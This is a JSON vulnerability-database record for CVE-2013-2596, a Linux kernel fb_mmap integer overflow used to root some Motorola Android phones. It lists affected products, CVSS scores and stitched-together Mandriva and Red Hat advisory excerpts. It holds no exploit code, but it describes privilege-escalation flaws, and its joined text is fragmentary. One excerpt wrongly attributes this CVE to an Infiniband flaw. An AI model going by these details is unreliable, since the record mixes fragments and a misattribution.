        "vendor": "motorola",
        "version": "4.1.2"
      },
      {
        "model": "msm8960",
        "scope": null,
        "trust": 0.8,
        "vendor": "qualcomm",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.8.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.8.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.8.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.8.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.8.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.8.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.8.3"
      },
      {
        "model": "enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.2"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5"
      },
      {
        "model": "razr m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "motorola",
        "version": "0"
      },
      {
        "model": "razr hd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "motorola",
        "version": "0"
      },
      {
        "model": "atrix hd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "motorola",
        "version": "0"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1x8664"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1"
      },
      {
        "model": "ctpview",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "7.3"
      },
      {
        "model": "ctpview 7.1r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "ctpview 7.1r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "5"
      },
      {
        "model": "ctpview 7.3r1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "ctpview 7.1r3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-03380"
      },
      {
        "db": "BID",
        "id": "59264"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002238"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201304-199"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-2596"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.0.75",
                    "versionStartIncluding": "2.6.12",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.2.45",
                    "versionStartIncluding": "3.1",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.4.42",
                    "versionStartIncluding": "3.3",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.8.9",
                    "versionStartIncluding": "3.5",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:motorola:android:4.1.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:motorola:atrix_hd:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:motorola:razr_hd:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:motorola:razr_m:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:qualcomm:msm8960:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-2596"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "130871"
      },
      {
        "db": "PACKETSTORM",
        "id": "131312"
      },
      {
        "db": "PACKETSTORM",
        "id": "128664"
      },
      {
        "db": "PACKETSTORM",
        "id": "136240"
      },
      {
        "db": "PACKETSTORM",
        "id": "131409"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2013-2596",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": true,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 6.9,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2013-2596",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "CNVD-2013-03380",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2013-2596",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2013-03380",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201304-199",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2013-2596",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-03380"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-2596"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002238"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201304-199"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-2596"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Integer overflow in the fb_mmap function in drivers/video/fbmem.c in the Linux kernel before 3.8.9, as used in a certain Motorola build of Android 4.1.2 and other products, allows local users to create a read-write memory mapping for the entirety of kernel memory, and consequently gain privileges, via crafted /dev/graphics/fb0 mmap2 system calls, as demonstrated by the Motochopper pwn program. The Motorola Razr HD, Razr M and Atrix HD devices are devices that use the Qualcomm MSM8960 chip. Motorola Razr HD, Razr M and Atrix HD devices using Qualcomm\u0027s MSM8960 chip have security vulnerabilities under the Android 4.1.2 platform. Allows an attacker to connect to USB debugging mode, use the Android Debug Bridge (adb) to create a USB link, upload and execute the Motochopper pwn program to gain root access. Multiple Motorola devices for Android are prone to a local privilege-escalation vulnerability. \nLocal attackers can exploit this issue to gain root privileges, which may aid in further attacks. (CVE-2013-2596)\n \n arch/x86/kernel/cpu/perf_event_intel.c in the Linux kernel before\n 3.8.9, when the Performance Events Subsystem is enabled, specifies\n an incorrect bitmask, which allows local users to cause a denial of\n service (general protection fault and system crash) by attempting to\n set a reserved bit. (CVE-2013-1798)\n \n Use-after-free vulnerability in arch/x86/kvm/x86.c in the Linux kernel\n through 3.8.4 allows guest OS users to cause a denial of service (host\n OS memory corruption) or possibly have unspecified other impact via a\n crafted application that triggers use of a guest physical address (GPA)\n in (1) movable or (2) removable memory during an MSR_KVM_SYSTEM_TIME\n kvm_set_msr_common operation. (CVE-2013-2141)\n \n Heap-based buffer overflow in the tg3_read_vpd function in\n drivers/net/ethernet/broadcom/tg3.c in the Linux kernel before 3.8.6\n allows physically proximate attackers to cause a denial of service\n (system crash) or possibly execute arbitrary code via crafted firmware\n that specifies a long string in the Vital Product Data (VPD) data\n structure. (CVE-2013-1929)\n \n The main function in tools/hv/hv_kvp_daemon.c in hypervkvpd, as\n distributed in the Linux kernel before 3.8-rc1, allows local users\n to cause a denial of service (daemon exit) via a crafted application\n that sends a Netlink message. NOTE: this vulnerability exists because\n of an incorrect fix for CVE-2012-2669. (CVE-2013-1848)\n \n The flush_signal_handlers function in kernel/signal.c in the Linux\n kernel before 3.8.4 preserves the value of the sa_restorer field across\n an exec operation, which makes it easier for local users to bypass\n the ASLR protection mechanism via a crafted application containing\n a sigaction system call. (CVE-2013-0914)\n \n Heap-based buffer overflow in the wdm_in_callback function in\n drivers/usb/class/cdc-wdm.c in the Linux kernel before 3.8.4 allows\n physically proximate attackers to cause a denial of service (system\n crash) or possibly execute arbitrary code via a crafted cdc-wdm USB\n device. (CVE-2013-2548)\n \n The translate_desc function in drivers/vhost/vhost.c in the Linux\n kernel before 3.7 does not properly handle cross-region descriptors,\n which allows guest OS users to obtain host OS privileges by leveraging\n KVM guest OS privileges. (CVE-2013-0228)\n \n Memory leak in drivers/net/xen-netback/netback.c in the Xen netback\n functionality in the Linux kernel before 3.7.8 allows guest OS users to\n cause a denial of service (memory consumption) by triggering certain\n error conditions. (CVE-2013-0217)\n \n The Xen netback functionality in the Linux kernel before 3.7.8 allows\n guest OS users to cause a denial of service (loop) by triggering ring\n pointer corruption. (CVE-2012-6547)\n \n The updated packages provides a solution for these security issues.  The verification\n of md5 checksums and GPG signatures is performed automatically for you.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFRyE83mqjQ0CJFipgRAgpsAKDCNZxW0lBVmcEPovg8gYgjVzLm4wCgpzoW\ns4hnEgkN4Re4xoskJoTdPM0=\n=gyQf\n-----END PGP SIGNATURE-----\n\n\n. 6.2) - x86_64\n\n3. The ETHTOOL_DELAY variable has been added, which makes sure\nthe ethtool utility waits for some time before it tries to apply the\noptions settings, thus fixing the bug. (BZ#1138299)\n\n* During the memory allocation for a new socket to communicate to the\nserver, the rpciod daemon released a clean page which needed to be\ncommitted. However, the commit was queueing indefinitely as the commit\ncould only be provided with a socket connection. As a consequence, a\ndeadlock occurred in rpciod. This update sets the PF_FSTRANS flag on the\nwork queue task prior to the socket allocation, and adds the\nnfs_release_page check for the flag when deciding whether to make a commit\ncall, thus fixing this bug. \n\n* It was found that the Linux kernel\u0027s Infiniband subsystem did not\nproperly sanitize input parameters while registering memory regions from\nuser space via the (u)verbs API. (CVE-2013-2596, Important)\n\n* It was found that the Linux kernel\u0027s KVM implementation did not ensure\nthat the host CR4 control register value remained unchanged across VM\nentries on the same virtual CPU. (CVE-2014-3690, Moderate)\n\n* It was found that the parse_rock_ridge_inode_internal() function of the\nLinux kernel\u0027s ISOFS implementation did not correctly check relocated\ndirectories when processing Rock Ridge child link (CL) tags. (CVE-2014-5471, CVE-2014-5472, Low)\n\n* A stack-based buffer overflow flaw was found in the TechnoTrend/Hauppauge\nDEC USB device driver. \n\nThis update also fixes the following bugs:\n\n* Previously, a NULL pointer check that is needed to prevent an oops in the\nnfs_async_inode_return_delegation() function was removed. As a consequence,\na NFS4 client could terminate unexpectedly. The missing NULL pointer check\nhas been added back, and NFS4 client no longer crashes in this situation. \n(BZ#1187638)\n\n* Due to unbalanced multicast join and leave processing, the attempt to\nleave a multicast group that had not previously completed a join became\nunresponsive. This update resolves multiple locking issues in the IPoIB\nmulticast code that allowed multicast groups to be left before the joining\nwas entirely completed. Now, multicast join and leave failures or lockups\nno longer occur in the described situation. (BZ#1187663)\n\n* A failure to leave a multicast group which had previously been joined\nprevented the attempt to unregister from the \"sa\" service. Multiple locking\nissues in the IPoIB multicast join and leave processing have been fixed so\nthat leaving a group that has completed its join process is successful. \nAs a result, attempts to unregister from the \"sa\" service no longer lock up\ndue to leaked resources. (BZ#1187665)\n\n* Due to a regression, when large reads which partially extended beyond the\nend of the underlying device were done, the raw driver returned the EIO\nerror code instead of returning a short read covering the valid part of the\ndevice. The underlying source code has been patched, and the raw driver now\nreturns a short read for the remainder of the device. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1034490 - CVE-2013-2596 kernel: integer overflow in fb_mmap\n1134099 - CVE-2014-5471 CVE-2014-5472 kernel: isofs: unbound recursion when processing relocated directories\n1153322 - CVE-2014-3690 kernel: kvm: vmx: invalid host cr4 handling across vm entries\n1164266 - CVE-2014-8884 kernel: usb: buffer overflow in ttusb-dec\n1181166 - CVE-2014-8159 kernel: infiniband: uverbs: unprotected physical memory access\n1196581 - CVE-2015-1421 kernel: net: slab corruption from use after free on INIT collisions\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2014:1392-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2014-1392.html\nIssue date:        2014-10-14\nCVE Names:         CVE-2013-2596 CVE-2013-4483 CVE-2014-0181 \n                   CVE-2014-3122 CVE-2014-3601 CVE-2014-4608 \n                   CVE-2014-4653 CVE-2014-4654 CVE-2014-4655 \n                   CVE-2014-5045 CVE-2014-5077 \n=====================================================================\n\n1. Summary:\n\nUpdated kernel packages that fix multiple security issues, address several\nhundred bugs, and add numerous enhancements are now available as part of\nthe ongoing support and maintenance of Red Hat Enterprise Linux version 6. \nThis is the sixth regular update. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\n* A NULL pointer dereference flaw was found in the way the Linux kernel\u0027s\nStream Control Transmission Protocol (SCTP) implementation handled\nsimultaneous connections between the same hosts. A remote attacker could\nuse this flaw to crash the system. (CVE-2014-5077, Important)\n\n* An integer overflow flaw was found in the way the Linux kernel\u0027s Frame\nBuffer device implementation mapped kernel memory to user space via the\nmmap syscall. A local user able to access a frame buffer device file\n(/dev/fb*) could possibly use this flaw to escalate their privileges on the\nsystem. (CVE-2013-2596, Important)\n\n* A flaw was found in the way the ipc_rcu_putref() function in the Linux\nkernel\u0027s IPC implementation handled reference counter decrementing. \nA local, unprivileged user could use this flaw to trigger an Out of Memory\n(OOM) condition and, potentially, crash the system. (CVE-2013-4483,\nModerate)\n\n* It was found that the permission checks performed by the Linux kernel\nwhen a netlink message was received were not sufficient. A local,\nunprivileged user could potentially bypass these restrictions by passing a\nnetlink socket as stdout or stderr to a more privileged process and\naltering the output of this process. (CVE-2014-0181, Moderate)\n\n* It was found that the try_to_unmap_cluster() function in the Linux\nkernel\u0027s Memory Managment subsystem did not properly handle page locking in\ncertain cases, which could potentially trigger the BUG_ON() macro in the\nmlock_vma_page() function. A local, unprivileged user could use this flaw\nto crash the system. (CVE-2014-3122, Moderate)\n\n* A flaw was found in the way the Linux kernel\u0027s kvm_iommu_map_pages()\nfunction handled IOMMU mapping failures. A privileged user in a guest with\nan assigned host device could use this flaw to crash the host. \n(CVE-2014-3601, Moderate)\n\n* Multiple use-after-free flaws were found in the way the Linux kernel\u0027s\nAdvanced Linux Sound Architecture (ALSA) implementation handled user\ncontrols. A local, privileged user could use either of these flaws to crash\nthe system. (CVE-2014-4653, CVE-2014-4654, CVE-2014-4655, Moderate)\n\n* A flaw was found in the way the Linux kernel\u0027s VFS subsystem handled\nreference counting when performing unmount operations on symbolic links. \nA local, unprivileged user could use this flaw to exhaust all available\nmemory on the system or, potentially, trigger a use-after-free error,\nresulting in a system crash or privilege escalation. (CVE-2014-5045,\nModerate)\n\n* An integer overflow flaw was found in the way the lzo1x_decompress_safe()\nfunction of the Linux kernel\u0027s LZO implementation processed Literal Runs. \nA local attacker could, in extremely rare cases, use this flaw to crash the\nsystem or, potentially, escalate their privileges on the system. \n(CVE-2014-4608, Low)\n\nRed Hat would like to thank Vladimir Davydov of Parallels for reporting\nCVE-2013-4483, Jack Morgenstein of Mellanox for reporting CVE-2014-3601,\nVasily Averin of Parallels for reporting CVE-2014-5045, and Don A. \nBailey from Lab Mouse Security for reporting CVE-2014-4608. The security\nimpact of the CVE-2014-3601 issue was discovered by Michael Tsirkin of\nRed Hat. \n\nThis update also fixes several hundred bugs and adds numerous enhancements. \nRefer to the Red Hat Enterprise Linux 6.6 Release Notes for information on\nthe most significant of these changes, and the Technical Notes for further\ninformation, both linked to in the References. \n\nAll Red Hat Enterprise Linux 6 users are advised to install these updated\npackages, which correct these issues, and fix the bugs and add the\nenhancements noted in the Red Hat Enterprise Linux 6.6 Release Notes and\nTechnical Notes. The system must be rebooted for this update to\ntake effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258\n\nTo install kernel packages manually, use \"rpm -ivh [package]\". Do not use\n\"rpm -Uvh\" as that will remove the running kernel binaries from your\nsystem. You may use \"rpm -e\" to remove old kernels after determining that\nthe new kernel functions properly on your system. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n739866 - checkpolicy cannot parse /selinux/policy on ppc64 and s390x\n786463 - nfs mount hangs when kerberos ticket expires\n889471 - [Btrfs] BUG: unable to handle kernel NULL pointer dereference at (null)  btrfs_get_sb should return error when open_ctree failed\n915862 - The sync mount option does not work for NFSv4 mounts in RHEL6\n997651 - possible recursive locking detected\n998024 - nfsd sometimes grants delegations too soon following conflicting open requests\n1010882 - kvm: backport \"Improve create VCPU parameter\"\n1024854 - CVE-2013-4483 kernel: ipc: ipc_rcu_putref refcount races\n1027480 - alb_send_learning_packets using an obsolete EtherType\n1030411 - resizing thin-snapshot with external origin should return zeros behind origin\u0027s end\n1031488 - Restore the mask bit correctly in eoi_ioapic_irq()\n1034490 - CVE-2013-2596 kernel: integer overflow in fb_mmap\n1036972 - use after free in new nfsd DRC code\n1044438 - cifs: Unable to append to an existing file in cache=none mode. \n1059496 - KVM: x86 emulator: Implement jmp far opcode ff/5\n1063836 - kvm: 23090: cpu0 unhandled wrmsr 0x391 data 2000000f\n1065304 - kernel/sched: incorrect setup of sched_group-\u003ecpu_power for NUMA systems\n1069028 - ixgbevf prematurely strips VLAN tags\n1072373 - Along with the increase of vCPUs in guest, and guest OS will spend more time to boot up in specified machine. \n1077463 - gfs2: quotas not refreshed in gfs2_adjust_quota\n1090423 - Data integrity issue on rebuilding RAID 6 with 100MB resync speed\n1093076 - CVE-2014-3122 Kernel: mm: try_to_unmap_cluster() should lock_page() before mlocking\n1094265 - CVE-2014-0181 kernel: net: insufficient permision checks of netlink messages\n1095627 - missing vhost schedule causing thread starvation\n1100523 - ext4 filesystem option \u0027max_batch_time\u0027 actually displays \u0027min_batch_time\u0027 in /proc/mounts\n1113409 - CVE-2014-4653 Kernel: ALSA: control: do not access controls outside of protected regions\n1113445 - CVE-2014-4654 CVE-2014-4655 Kernel: ALSA: control: use-after-free in replacing user controls\n1113899 - CVE-2014-4608 kernel: lzo1x_decompress_safe() integer overflow\n1118123 - [Hyper-V][REHL 6.6] fcopy large file from host to guest failed\n1122472 - CVE-2014-5045 kernel: vfs: refcount issues during unmount on symlink\n1122982 - CVE-2014-5077 Kernel: net: SCTP: fix a NULL pointer dereference during INIT collisions\n1124351 - raid1 Data corruption after recovery with bitmap\n1127231 - dmeventd hanging while handling lost leg in RAID1 LV\n1131951 - CVE-2014-3601 kernel: kvm: invalid parameter passing in kvm_iommu_map_pages()\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nkernel-2.6.32-504.el6.src.rpm\n\ni386:\nkernel-2.6.32-504.el6.i686.rpm\nkernel-debug-2.6.32-504.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-504.el6.i686.rpm\nkernel-debug-devel-2.6.32-504.el6.i686.rpm\nkernel-debuginfo-2.6.32-504.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-504.el6.i686.rpm\nkernel-devel-2.6.32-504.el6.i686.rpm\nkernel-headers-2.6.32-504.el6.i686.rpm\nperf-2.6.32-504.el6.i686.rpm\nperf-debuginfo-2.6.32-504.el6.i686.rpm\npython-perf-debuginfo-2.6.32-504.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-504.el6.noarch.rpm\nkernel-doc-2.6.32-504.el6.noarch.rpm\nkernel-firmware-2.6.32-504.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-504.el6.x86_64.rpm\nkernel-debug-2.6.32-504.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm\nkernel-devel-2.6.32-504.el6.x86_64.rpm\nkernel-headers-2.6.32-504.el6.x86_64.rpm\nperf-2.6.32-504.el6.x86_64.rpm\nperf-debuginfo-2.6.32-504.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-504.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-504.el6.i686.rpm\nkernel-debuginfo-2.6.32-504.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-504.el6.i686.rpm\nperf-debuginfo-2.6.32-504.el6.i686.rpm\npython-perf-2.6.32-504.el6.i686.rpm\npython-perf-debuginfo-2.6.32-504.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm\nperf-debuginfo-2.6.32-504.el6.x86_64.rpm\npython-perf-2.6.32-504.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-504.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nkernel-2.6.32-504.el6.src.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-504.el6.noarch.rpm\nkernel-doc-2.6.32-504.el6.noarch.rpm\nkernel-firmware-2.6.32-504.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-504.el6.x86_64.rpm\nkernel-debug-2.6.32-504.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm\nkernel-devel-2.6.32-504.el6.x86_64.rpm\nkernel-headers-2.6.32-504.el6.x86_64.rpm\nperf-2.6.32-504.el6.x86_64.rpm\nperf-debuginfo-2.6.32-504.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-504.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm\nperf-debuginfo-2.6.32-504.el6.x86_64.rpm\npython-perf-2.6.32-504.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-504.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 